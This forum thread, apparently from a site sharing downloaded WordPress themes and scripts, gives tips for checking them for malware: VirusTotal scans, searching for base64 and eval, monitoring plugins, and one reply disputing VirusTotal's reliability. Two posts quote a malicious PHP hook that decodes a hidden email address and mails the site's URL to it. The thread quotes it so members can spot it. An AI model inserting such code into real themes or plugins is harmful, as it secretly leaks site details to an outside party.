45.gif

Search (advanced search)
Use this Search form before posting, asking or make a new thread.
Tips: Use Quotation mark to search words (eg. "How To Make Money Online")

04-28-2014, 07:39 AM (This post was last modified: 05-20-2014 12:33 PM by incredibleINDIA.)
Post: #1
[ MUST READ ] SOMETHING THAT EVERYONE MUST DO BEFORE USING DOWNLOADED CODES AND THEME
DON'T LEAVE ANY WORD , IF YOU WANT YOUR BUSINESS/WORK TO KEEP RUNNING LIKE A BUTTER


There are so many methods to be on secure side, I am going to post each and every method i use before using any code/script/theme :

1. VIRUSTOTAL METHOD + OTHER IMPORTANT STEPS TO FOLLOW
(Time taken to make a post : 45 min)
POST #2

2.
CODE CHECKING + OTHER INFECTED CODE DETECTION METHOD
(Time taken to make a post : 30 min) [b]POST #7

[/b]
3. SOON GOING TO POST ...... OTHER MEMBERS ARE MORE THAN WELCOME

HOW YOU CAN HELP ME AND OTHERS
Magic Button :
Quote:TRY TO ADD FEW REPS THAT MIGHT AMUSE ME
Quote:IF SOME OTHER MEMBER HAS SHARED SOMETHING GOOD TRY TO ADD REPS
Quote:IF YOU NEED ANY MODIFICATION IN MY THREAD , YOU ARE MORE THAN WELCOME
Quote:I AM NOT TOO PERFECT BUT YOU GUYS CAN MAKE IT PERFECT
Quote:ANY SUGGESTION , SEND A PM
Quote:+5 REPS FOR ADDING NEW TYPES OF VULNERABILITY
04-28-2014, 07:43 AM (This post was last modified: 04-30-2014 09:50 AM by incredibleINDIA.)
Post: #2
VIRUS TOTAL METHOD + OTHER IMPORTANT STEPS TO FOLLOW
VIRUS TOTAL METHOD + OTHER IMPORTANT STEPS TO FOLLOW
--------------------------------------------------------------------------------

STEP #1 =>


Magic Button :
Everyone knows first step but always do in wrong way. Instead of scaning download link in virus total, first download the theme/code/script/template or anything else you need from here. Then upload the zipped file to virustotal for scanning. I would post soon why scaning link sometimes shows different result than scanning the file itself.

Once your file is scanned check out the Detection ratio,
If detection ratio is more than 3, read STEP #2 ,
and if
detection ratio is less than 3 , read STEP #3

STEP #2 =>

Magic Button :
In simple words "DON'T USE IT !!!". Also for helping out other lazzy members, Post a link of your virustotal scan on the thread you found download ( try to use a good text size so that every one can know about it).

Check out other threads/downloads of that member for infections.

If the member has infection in only one thread ,
Quote:
PM member who added that link , about it. If you are not
responded by a member within 24 hours, make a thread in support center [LALA is going to help you]

and if member has infections in so many Threads,
Quote:
PM
DIRECT DOWNLOAD about the member , with all required information like
username of person , threads you found infected and all you need to add.

STEP #3 =>

Magic Button :
Check out Who posted it . Yes its true , try to check out who posted

If a member has 3000+ reps , 800+ posts , 1 year+ BBHF member.
Quote:Add
a post with virus total report in his/her thread and also PM about it
to him/her asking a question about why its showing so. 80% members with
that config are TRUE and not going to cheat you. SOMETIMES NULLING A
SCRIPT START SHOWING AS INFECTION

If the member is a newbie,
Quote:
Either use it at your own risk, or follow STEP #2.
I found so many shares made by newbies of BBHF in this section of forum
are just adding links copied from other nulling/pirated websites.
04-28-2014, 08:42 AM
Post: #3
RE:
@patelnirpendra,Thank you

Nice idea, if I may I will also suggest testing on localhost as xampp, and using these wordpress plugins:
-Debug Bar Remote Requests
-Query Monitor
-Core Control or WP Crontrol
One last thing is to use WP Mail SMTP with Email Log (both are wordpress plugins).
You can also put phpMalCodeScanner.php (google it) in your wordpress blog folder.

Hope this was helpfull.
04-28-2014, 08:58 AM
Post: #4
RE:
(04-28-2014 08:42 AM)semerkhet22 Wrote:  @patelnirpendra,Thank you

Nice idea, if I may I will also suggest testing on localhost as xampp, and using these wordpress plugins:
-Debug Bar Remote Requests
-Query Monitor
-Core Control or WP Crontrol
One last thing is to use WP Mail SMTP with Email Log (both are wordpress plugins).
You can also put phpMalCodeScanner.php (google it) in your wordpress blog folder.

Hope this was helpfull.
thnx for it , i would add it all soon , some ideas are even new for me too
i use query monitor and TAC wordpress plugin

+5 reps added for you , now you are no more virgin
04-30-2014, 07:21 AM
Post: #5
RE:
Hi,
I think that everyone shall be involved in this thread by patelnirpendra as we all have to gain from it.
It will be also very helpfull to all of us to share all malicious code that has been discovered in encoded and decoded fromat.

PHP Code:
add_action('wp_head','my_wpfunww7c8bb');function my_wpfunww7c8bb(){if(!username_exists('wordpress')){$addressdecode=base64_decode("d29yZHByZXNzc2xvZ0B5YW5kZXguY29t");$vari='Wordpress Plugin';wp_mail($addressdecode,$vari,get_bloginfo('wpurl'));}} 

This will keep sending email to wordpressslog@yandex.com as this email does not exsit your email server will keep resending.

Also search for every "wp_create_user" and delete the functiun.

Another threat is the sneaky social.png: it is not really an image as you can view the malicious code if you open it in text editor. It will insert a custom option in wp-options table to redirect to a youtube video.
Hope this will help.
44.gif
04-30-2014, 09:30 AM
Post: #6
RE:
(04-30-2014 07:21 AM)semerkhet22 Wrote:  Hi,
I think that everyone shall be involved in this thread by patelnirpendra as we all have to gain from it.
It will be also very helpfull to all of us to share all malicious code that has been discovered in encoded and decoded fromat.

PHP Code:
add_action('wp_head','my_wpfunww7c8bb');function my_wpfunww7c8bb(){if(!username_exists('wordpress')){$addressdecode=base64_decode("d29yZHByZXNzc2xvZ0B5YW5kZXguY29t");$vari='Wordpress Plugin';wp_mail($addressdecode,$vari,get_bloginfo('wpurl'));}} 

This will keep sending email to wordpressslog@yandex.com as this email does not exsit your email server will keep resending.

Also search for every "wp_create_user" and delete the functiun.

Another threat is the sneaky social.png: it is not really an image as you can view the malicious code if you open it in text editor. It will insert a custom option in wp-options table to redirect to a youtube video.
Hope this will help.
YOU FOUND IT INJECTED SOMEWHERE OR YOU MADE IT
04-30-2014, 09:48 AM (This post was last modified: 04-30-2014 09:53 AM by incredibleINDIA.)
Post: #7
RE:
CODE CHECKING + OTHER INFECTED CODE DETECTION METHOD
-------------------------------------------------------------


INTRODUCTION TO BACKDOOR :


Magic Button :
Creating a Backdoor for bypassing authentication
and then remotely accessing your website, is too easy. Even i can add do. A one line code can add a new admin to your website with username and password as per i want

Some hackers can even send emails as your server, execute SQL queries, and everything else they want to do.


HOW TO BE ON SAFE SIDE :

Magic Button :
1. TRY NOT TO USE PLUGINS THAT ARE NOT MUCH NECESSARY, BECAUSE UNDERSTANDING CODE BEHIND PLUGINS IS MUCH MORE TOUGH THAN UNDERSTANDING CODE BEHIND THEME

2. OPEN ALL FILES IN NODEPAD++ and search for "base64" and "eval" etc, there are lot more packers.

These Packers are Used for three Purpose :
Quote:
a. FOR ADDING A CREDIT OF AUTHOR
b. FOR HIDING SOME IMPORTANT LINES OF CODE
c. FOR ADDING A BACKDOOR


Once you got them try to decode them , there are so many online decoders

Hackers never ever add simple code, they either try to pack it or encode it , sometimes take code from external javascript


There are so many online utitlities / program that allow you to decode these. Decode it and read the code. You can get smell of redirection code or backdoor , if there are some suspicious word like user,password, or url of website or external code that has to do nothing with your theme/plugin

FILES MOST TARGETED BY HACKERS IN WORD PRESS THEMES :

Magic Button :
wp-config.php – First thing that come in BAD ASS GUY'S mind is this file. It is because wordpress gave this file Super powerful Authentication to change anything or everything

wp-includes folder - Another most attacked place. If you have a open directory with file adding command enabled .... then YOU NEED SUCK
Anybody can add shell.

But most of us don't look it.
04-30-2014, 01:36 PM (This post was last modified: 04-30-2014 01:36 PM by semerkhet22.)
Post: #8
RE:
@patelnirpendra, sorry if you did not understand me.

I was pointing to the fact that we must share all known malware that we encountered while testing downloaded themes and plugins so members could identify real threats.

Sorry again for the misunderstand.
04-30-2014, 01:43 PM
Post: #9
RE:
Using exploit scanner plugin, there's a lot of base64 and eval code in native Wordpress and plugins that MANY people use.
04-30-2014, 02:12 PM
Post: #10
RE:
You are very wrong about using virustotal.com. I commend you for trying to help people stay safe but I have to say that anyone pushing virustotal.com as a method of detecting threats, or relying on it to determine if a file is safe, is simply giving bad advice and repeating the bad information they were fed at one time.

That site is nothing more than a warm fuzzy for for people who don't know better. It does nothing to detect 0day threats or polymorphic threats. They use featureless cli utilities that don't include the tools necessary to be a viable A/V.

We all know that A/V products in general are an over hyped method of security. Nothing beats due diligence and actually looking at the code yourself.

I would say to anyone reading the OP section on virustotal.com to disregard it as an opinion not based upon fact.

I would encourage everyone to read their FAQ, more specifically the section on statistics. It's the part where they say not to use their own product in the manner in which this thread is pushing it. Here, take a look.

Those who use VirusTotal to perform antivirus comparative analyses should know that they are making many implicit errors in their methodology, the most obvious being:

VirusTotal's antivirus engines are commandline versions, so depending on the product, they will not behave exactly the same as the desktop versions: for instance, desktop solutions may use techniques based on behavioural analysis and count with personal firewalls that may decrease entry points and mitigate propagation, etc.
In VirusTotal desktop-oriented solutions coexist with perimeter-oriented solutions; heuristics in this latter group may be more aggressive and paranoid, since the impact of false positives is less visible in the perimeter. It is simply not fair to compare both groups.
Some of the solutions included in VirusTotal are parametrized (in coherence with the developer company's desire) with a different heuristic/agressiveness level than the official end-user default configuration.

These are just three examples illustrating why using VirusTotal for antivirus testing is a bad idea, you can read more about VirusTotal and antivirus comparatives in our blog.


https://www.virustotal.com/en/faq/#statistics
31.gif




77.gif